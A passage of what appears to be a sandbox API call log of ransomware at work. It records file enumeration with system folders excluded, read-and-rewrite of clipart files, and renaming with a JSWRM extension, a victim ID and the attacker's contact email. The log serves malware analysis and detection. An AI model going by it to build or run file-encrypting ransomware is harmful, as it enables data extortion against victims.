lpWideCharStr="PH02742G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02742G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02742G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0094.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.509] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20645) returned 1 [0094.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50a0) returned 0x24d210 [0094.510] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x50a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x50a0, lpOverlapped=0x0) returned 1 [0094.664] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.664] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x50a0, lpOverlapped=0x0) returned 1 [0094.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.664] CloseHandle (hObject=0x314) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0094.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0094.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0094.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0094.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0094.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0094.674] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02742U.BMP", cAlternateFileName="")) returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2=".") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="..") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="...") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="windows") returned -1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="recovery") returned -1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="perflogs") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="documents and settings") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="system volume information") returned -1 [0094.674] lstrcmpiW (lpString1="PH02742U.BMP", lpString2="msocache") returned 1 [0094.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02742U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0094.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02742U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02742U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0094.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0094.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.675] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.676] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.679] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.680] CloseHandle (hObject=0x314) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0094.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0094.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0094.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0094.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02742U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02742u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0094.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0094.681] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6d86, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02743G.GIF", cAlternateFileName="")) returned 1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2=".") returned 1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="..") returned 1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="...") returned 1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="windows") returned -1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="recovery") returned -1 [0094.681] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="perflogs") returned 1 [0094.682] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="documents and settings") returned 1 [0094.682] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.682] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="system volume information") returned -1 [0094.682] lstrcmpiW (lpString1="PH02743G.GIF", lpString2="msocache") returned 1 [0094.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02743G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02743G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02743G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0094.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02743G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02743G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02743G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0094.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.683] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28038) returned 1 [0094.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6d80) returned 0x24d210 [0094.684] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6d80, lpOverlapped=0x0) returned 1 [0094.687] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.688] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6d80, lpOverlapped=0x0) returned 1 [0094.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.688] CloseHandle (hObject=0x314) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0094.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0094.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0094.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0094.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0094.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0094.689] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02743G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02743g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.690] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5e7b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02746G.GIF", cAlternateFileName="")) returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2=".") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="..") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="...") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="windows") returned -1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="recovery") returned -1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="perflogs") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="documents and settings") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="system volume information") returned -1 [0094.690] lstrcmpiW (lpString1="PH02746G.GIF", lpString2="msocache") returned 1 [0094.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02746G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0094.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02746G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02746G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0094.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0094.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 